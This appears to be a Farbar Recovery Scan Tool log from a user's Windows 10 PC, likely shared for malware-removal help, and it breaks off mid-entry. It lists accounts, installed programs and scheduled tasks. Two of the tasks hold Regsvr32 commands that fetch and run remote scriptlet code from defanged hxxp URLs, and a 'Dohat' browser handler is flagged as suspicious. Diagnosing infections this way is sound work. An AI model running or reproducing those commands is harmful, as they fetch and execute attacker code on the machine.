Additional scan result of Farbar Recovery Scan Tool (x64) Version: 17-04-2017 01 Ran by Sebastian (19-04-2017 16:07:47) Running from C:\Users\defaultuser0\AppData\Local\Temp\scoped_dir9192_6933 Windows 10 Pro Version 1607 (X64) (2017-02-26 12:58:01) Boot Mode: Normal ========================================================== ==================== Accounts: ============================= Administrator (S-1-5-21-1598336150-3831977320-3807009325-500 - Administrator - Disabled) => C:\Users\Administrator DefaultAccount (S-1-5-21-1598336150-3831977320-3807009325-503 - Limited - Disabled) Guest (S-1-5-21-1598336150-3831977320-3807009325-501 - Limited - Disabled) HomeGroupUser$ (S-1-5-21-1598336150-3831977320-3807009325-1002 - Limited - Enabled) Sebastian (S-1-5-21-1598336150-3831977320-3807009325-1000 - Administrator - Enabled) => C:\Users\defaultuser0 ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Installed Programs ====================== (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) 64 Bit HP CIO Components Installer (Version: 7.2.8 - Hewlett-Packard) Hidden 7-Zip 15.12 (x64) (HKLM\...\7-Zip) (Version: 15.12 - Igor Pavlov) Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.9.5.353 - Adobe Systems Incorporated) Adobe Flash Player 24 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 24.0.0.194 - Adobe Systems Incorporated) Adobe Flash Player 24 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 24.0.0.194 - Adobe Systems Incorporated) Adobe Illustrator CC 2015 (HKLM-x32\...\{5680D629-B263-49CC-821E-3CEBD4507B51}) (Version: 19.0 - Adobe Systems Incorporated) Adobe InDesign CC 2015 (HKLM-x32\...\{BC448016-6F11-1014-B0EA-97CEE6E26CB8}) (Version: 11.0 - Adobe Systems Incorporated) Adobe Photoshop CC 2015 (HKLM-x32\...\{793C2BF7-A4FE-4608-91C9-9282C5801C21}) (Version: 16.1 - Adobe Systems Incorporated) AIMP (HKLM-x32\...\AIMP) (Version: v4.02.1725, 11.06.2016 - AIMP DevTeam) AIO_Scan (x32 Version: 130.0.421.000 - Hewlett-Packard) Hidden AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 9.0.000.8 - Advanced Micro Devices, Inc.) Aplikacja Blizzard (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment) Ashampoo Burning Studio FREE v.1.14.5 (HKLM-x32\...\{91B33C97-91F8-FFB3-581B-BC952C901685}_is1) (Version: 1.14.5 - Ashampoo GmbH & Co. KG) Asystent uaktualnienia do systemu Windows 10 (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.17354 - Microsoft Corporation) BitTorrent (HKU\S-1-5-21-1598336150-3831977320-3807009325-1000\...\BitTorrent) (Version: 7.9.9.43389 - BitTorrent Inc.) Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.) BufferChm (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden Call of Duty 2 version 1.3.0.0 (HKLM-x32\...\Call of Duty 2_is1) (Version: 1.3.0.0 - Mr DJ) Catalyst Control Center Next Localization BR (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization BR (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization BR (Version: 2017.0303.2232.40545 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHS (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHS (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHS (Version: 2017.0303.2232.40545 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHT (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHT (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHT (Version: 2017.0303.2232.40545 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CS (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CS (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CS (Version: 2017.0303.2232.40545 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DA (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DA (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DA (Version: 2017.0303.2232.40545 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DE (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DE (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DE (Version: 2017.0303.2232.40545 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization EL (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization EL (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization EL (Version: 2017.0303.2232.40545 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization ES (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization ES (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization ES (Version: 2017.0303.2232.40545 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FI (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FI (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FI (Version: 2017.0303.2232.40545 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FR (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FR (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FR (Version: 2017.0303.2232.40545 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization HU (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization HU (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization HU (Version: 2017.0303.2232.40545 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization IT (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization IT (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization IT (Version: 2017.0303.2232.40545 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization JA (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization JA (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization JA (Version: 2017.0303.2232.40545 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization KO (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization KO (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization KO (Version: 2017.0303.2232.40545 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NL (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NL (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NL (Version: 2017.0303.2232.40545 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NO (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NO (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NO (Version: 2017.0303.2232.40545 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization PL (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization PL (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization PL (Version: 2017.0303.2232.40545 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization RU (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization RU (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization RU (Version: 2017.0303.2232.40545 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization SV (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization SV (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization SV (Version: 2017.0303.2232.40545 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TH (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TH (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TH (Version: 2017.0303.2232.40545 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TR (Version: 2015.1129.2307.41591 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TR (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TR (Version: 2017.0303.2232.40545 - Advanced Micro Devices, Inc.) Hidden Cities: Skylines (HKLM\...\Steam App 255710) (Version: - Colossal Order Ltd.) Core Temp version 0.99.8 (HKLM\...\{086D343F-8E78-4AFC-81AC-D6D414AFD8AC}_is1) (Version: 0.99.8 - Arthur Liberman) Counter-Strike: Global Offensive (HKLM\...\Steam App 730) (Version: - Valve) DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.2.0.0114 - Disc Soft Ltd) DJ_AIO_Software (x32 Version: 140.0.428.000 - Hewlett-Packard) Hidden DJ_AIO_Software_min (x32 Version: 140.0.425.000 - Hewlett-Packard) Hidden Dont Starve Together (HKLM-x32\...\Dont Starve Together_is1) (Version: - ) f.lux (HKU\S-1-5-21-1598336150-3831977320-3807009325-1000\...\Flux) (Version: - ) FlashPeak Slimjet 64bit (HKLM\...\Slimjet) (Version: 6.0.9.0 - FlashPeak Inc.) GitHub (HKU\S-1-5-21-1598336150-3831977320-3807009325-1000\...\5f7eb300e2ea4ebf) (Version: 3.2.0.0 - GitHub, Inc.) Grand Theft Auto V (HKLM\...\Steam App 271590) (Version: - Rockstar North) HiPatch (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF000}) (Version: 5.1.0.2 - Hi-Rez Studios) Hi-Rez Studios Authenticate and Update Service (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF1FC}) (Version: 3.0.0.0 - Hi-Rez Studios) HP Deskjet All-In-One Software (HKLM\...\{2CB8566A-8EA6-417A-BAB1-1B10A88C79BB}) (Version: 14.0 - HP) HPPhotoGadget (x32 Version: 140.0.524.000 - Hewlett-Packard) Hidden INSIDE (HKLM\...\Steam App 304430) (Version: - Playdead) Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.6.0.1025 - Intel Corporation) Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 21.20.16.4534 - Intel Corporation) Intel(R) Serial IO (HKLM\...\{9FD91C5C-44AE-4D9D-85BE-AE52816B0294}) (Version: 30.63.1519.7 - Intel Corporation) Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 3.0.5.69 - Intel Corporation) Java 8 Update 121 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180121F0}) (Version: 8.0.1210.13 - Oracle Corporation) Microsoft Chart Controls for Microsoft .NET Framework 3.5 (HKLM-x32\...\{41785C66-90F2-40CE-8CB5-1C94BFC97280}) (Version: 3.5.0.0 - Microsoft Corporation) Microsoft Office Professional Plus 2013 (HKLM\...\Office15.PROPLUSR) (Version: 15.0.4420.1017 - Microsoft Corporation) Microsoft OneDrive (HKU\S-1-5-21-1598336150-3831977320-3807009325-1000\...\OneDriveSetup.exe) (Version: 17.3.6799.0327 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 Redistributable - x86 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24123 (HKLM-x32\...\{2cbcedbb-f38c-48a3-a3e1-6c6fd821a7f4}) (Version: 14.0.24123.0 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23918 (HKLM-x32\...\{2e085fd2-a3e4-4b39-8e10-6b8d35f55244}) (Version: 14.0.23918.0 - Microsoft Corporation) Napisy24 (HKLM-x32\...\{D1985DBC-F09E-4317-91B8-932AD0FD4A27}_is1) (Version: 1.8 - Napisy24.pl) NCSOFT Game Launcher (HKLM-x32\...\NCLauncher_NCWest) (Version: - NCSOFT) Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.8.8 - Notepad++ Team) NVIDIA PhysX (HKLM-x32\...\{8B922CF8-8A6C-41CE-A858-F1755D7F5D29}) (Version: 9.12.1031 - NVIDIA Corporation) OpenAL (HKLM-x32\...\OpenAL) (Version: - ) OpenIV (HKU\S-1-5-21-1598336150-3831977320-3807009325-1000\...\OpenIV) (Version: 2.8.703 - .black/OpenIV Team) Opera Stable 43.0.2442.1144 (HKLM-x32\...\Opera 43.0.2442.1144) (Version: 43.0.2442.1144 - Opera Software) Oprogramowanie mikroukładu Intel® (x32 Version: 10.1.1.9 - Intel(R) Corporation) Hidden Origin (HKLM-x32\...\Origin) (Version: 10.4.5.30491 - Electronic Arts, Inc.) Outils de vérification linguistique 2013 de Microsoft Office - Français (Version: 15.0.4420.1017 - Microsoft Corporation) Hidden Overwatch (HKLM-x32\...\Overwatch) (Version: - Blizzard Entertainment) PC Remote (HKLM-x32\...\{C934DF74-D0D9-445C-90AA-34012A04E11D}) (Version: 3.51 - PC Remote) PokerStars.eu (HKLM-x32\...\PokerStars.eu) (Version: - PokerStars.eu) PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.993 - Even Balance, Inc.) Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.9.422.2016 - Realtek) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7885 - Realtek Semiconductor Corp.) RivaTuner Statistics Server 6.5.1 (HKLM-x32\...\RTSS) (Version: 6.5.1 - Unwinder) Rocket League (HKLM\...\Steam App 252950) (Version: - Psyonix, Inc.) Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 1.2.1.4 - Rockstar Games) RubberWorm 0.0.1.17 - (HKLM-x32\...\RubberWorm 0.0.1.17 -) (Version: - - Kawoosh) Scan (x32 Version: 140.0.253.000 - Hewlett-Packard) Hidden ScreenShot (HKLM-x32\...\ScreenShot) (Version: 2.0.4 - Filseclab Corporation) screenSHU - the fastest screen capture ever. (HKLM-x32\...\screenSHU) (Version: - ) SmartGit (HKLM-x32\...\SmartGit d:/program files (x86)/smartgit_is1) (Version: - syntevo GmbH) Spotify (HKU\S-1-5-21-1598336150-3831977320-3807009325-1000\...\Spotify) (Version: 1.0.53.758.gde3fc4b2 - Spotify AB) Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation) Super Meat Boy (HKLM\...\Steam App 40800) (Version: - Team Meat) TeamSpeak 3 Client (HKU\S-1-5-21-1598336150-3831977320-3807009325-1000\...\TeamSpeak 3 Client) (Version: 3.0.19 - TeamSpeak Systems GmbH) Telegram Desktop version 1.0.14 (HKU\S-1-5-21-1598336150-3831977320-3807009325-1000\...\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1) (Version: 1.0.14 - Telegram Messenger LLP) Toolbox (x32 Version: 140.0.596.000 - Hewlett-Packard) Hidden Tunngle (HKLM-x32\...\Tunngle_is1) (Version: 5.8.8 - Tunngle.net GmbH) Unity Web Player (HKU\S-1-5-21-1598336150-3831977320-3807009325-1000\...\UnityWebPlayer) (Version: 5.3.6f1 - Unity Technologies ApS) UnloadSupport (x32 Version: 11.0.0 - Hewlett-Packard) Hidden Uplay (HKLM-x32\...\Uplay) (Version: 22.2 - Ubisoft) Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies) Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.) VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.4 - VideoLAN) Vulkan Run Time Libraries 1.0.17.0 (HKLM\...\VulkanRT1.0.17.0) (Version: 1.0.17.0 - LunarG, Inc.) Vulkan Run Time Libraries 1.0.37.0 (HKLM\...\VulkanRT1.0.37.0) (Version: 1.0.37.0 - LunarG, Inc.) WebReg (x32 Version: 140.0.297.017 - Hewlett-Packard) Hidden XAMPP (HKLM-x32\...\xampp) (Version: 5.6.23-0 - Bitnami) ==================== Custom CLSID (Whitelisted): ========================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) HKU\S-1-5-21-1598336150-3831977320-3807009325-1000\...\ChromeHTML: -> C:\Program Files (x86)\Dohat\Application\chrome.exe (Google Inc.) <==== ATTENTION CustomCLSID: HKU\S-1-5-21-1598336150-3831977320-3807009325-1000_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems) ==================== Scheduled Tasks (Whitelisted) ============= (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) Task: {05B4F803-496C-425F-BA15-E3971F4FB4CE} - System32\Tasks\AdobeAAMUpdater-1.0-Sebastian-PC-Sebastian => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2016-07-01] (Adobe Systems Incorporated) Task: {0B8E80F9-65C8-4D26-BC45-296549F79A18} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => %SystemRoot%\ehome\ehPrivJob.exe Task: {0CE3E4C2-E507-402A-B2D5-602726410730} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => %SystemRoot%\ehome\mcupdate.exe Task: {1598C016-9843-43C5-B21C-39DA7EF54690} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION Task: {16E9B9FE-07DA-4809-AA53-62A4F30CE915} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => %SystemRoot%\ehome\mcupdate.exe Task: {17EBACB7-8744-48DC-915B-A9227CCA8FD4} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe [2012-10-01] (Microsoft Corporation) Task: {1B0854B0-A786-4AD9-9281-EE6AD39F1D77} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => %windir%\ehome\MCUpdate.exe Task: {2157F27B-81CA-42FF-BF6E-9DE52A9AF897} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => %SystemRoot%\ehome\ehPrivJob.exe Task: {26C1089C-F9F8-4533-A20A-04895F5C0699} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj1SMjH3OWRYRUI3MUNWOUEyFkE3OUJYF8NLMWHdMjMdMq== scrobj.dll Task: {28ACAB0B-1B1C-4EE9-A1F2-D9F5998C6F33} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj1SMjH3OWRYRUI3MUNWOUEyFkE3OUJYF8NLMWHdMjMdMq== scrobj.dll Task: {2A616F79-3CC1-47EA-9EA6-77DD0C2F71B6} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => %SystemRoot%\ehome\ehPrivJob.exe Task: {339CDA64-8355-4D70-AD44-5580747F0ABC} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => %SystemRoot%\ehome\mcupdate.exe Task: {38EC9935-F799-415D-B344-B07D3CAB9F43} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => %SystemRoot%\ehome\ehPrivJob.exe Task: {3DA9614A-8020-426F-A8F2-6EFF2F5288B4} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [2012-10-01] (Microsoft Corporation) Task: {3EDE803B-9669-43D0-90F1-79EB91E9E42E} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> No File <==== ATTENTION Task: {419C1063-075A-401E-A067-E2202B60BF1E} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\Program Files\Windows Defender\\MpCmdRun.exe [2017-03-28] (Microsoft Corporation) Task: {4DA2D0B8-0532-4C48-9C4F-A7924301E445} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION Task: {53EA777C-0A6A-4D91-AEEE-43984166DDD7} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => %SystemRoot%\ehome\ehPrivJob.exe Task: {620378B5-3A77-4A68-9F5C-41EA51EDFF77} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => %SystemRoot%\ehome\ehrec.exe Task: {703BF5C2-EF77-477B-9623-111541D73BD4} - System32\Tasks\Intel PTT EK Recertification => C:\Program Files\Intel\iCLS Client\IntelPTTEKRecertification.exe [2016-07-26] (Intel(R) Corporation) Task: {704232ED-E005-4766-B336-53A1C7EE377F} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => %SystemRoot%\ehome\mcupdate.exe Task: {79ED5620-0609-489D-9BB8-3F2473C7388F} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\Program Files\Windows Defender\\MpCmdRun.exe [2017-03-28] (Microsoft Corporation) Task: {8305E5E1-AF9E-4FAF-A3D8-E486FEC20E50} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [2017-03-04] (Advanced Micro Devices, Inc.) Task: {86574406-BD25-4CD1-A8DD-A612FAF10550} - \CCleanerSkipUAC -> No File <==== ATTENTION Task: {8A8A538C-6AB5-47E4-9928-83032979C9EA} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> No File <==== ATTENTION Task: {8B6164F7-5480-4600-A2CA-FA6E17ACD59E} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => %SystemRoot%\ehome\ehPrivJob.exe Task: {8D60ECDC-0D8C-469F-BFA5-61459132F66D} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => %SystemRoot%\ehome\mcupdate.exe Task: {926ACA25-596C-49EB-A1C0-A8D7FBC5DA4A} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-03-31] () Task: {9377B6ED-B450-4669-ABD6-ED3581431BB7} - System32\Tasks\Microsoft Office 15 Sync Maintenance for Sebastian-PC-Sebastian Sebastian-PC => C:\Program Files\Microsoft Office\Office15\MsoSync.exe [2012-10-01] (Microsoft Corporation) Task: {9A8FDBF8-2E04-40EE-A73C-8F658ADC7A7A} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => %SystemRoot%\ehome\ehPrivJob.exe Task: {9DE220F0-87F7-4E1A-9A01-D187C3FF7661} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION Task: {9E312A1A-A033-40C6-9AAE-E7FB8B58AA73} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => %SystemRoot%\ehome\ehPrivJob.exe Task: {A44BA662-A53F-48AA-A605-0CCC5AB81412} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\Program Files\Windows Defender\\MpCmdRun.exe [2017-03-28] (Microsoft Corporation) Task: {AC715F04-CD14-48B5-BED2-F7E4428B7350} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => %SystemRoot%\ehome\ehPrivJob.exe Task: {BCC837CB-41AB-4875-BAAB-2D47795813C9} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => %SystemRoot%\ehome\ehPrivJob.exe Task: {BF6198EA-BF4F-4933-8F14-6E677A2ED50A} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => %SystemRoot%\ehome\mcupdate.exe Task: {BF90838A-B8BC-4EAE-B6E1-A93751C07229} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => %SystemRoot%\ehome\mcupdate.exe Task: {C636EC12-219C-438F-91D3-91457C72EFD5} - System32\Tasks\Opera scheduled Autoupdate 1451055233 => C:\Program Files (x86)\Opera\launcher.exe [2017-02-27] (Opera Software) Task: {C6E1F737-A090-4E4D-A110-051B2D51622A} - 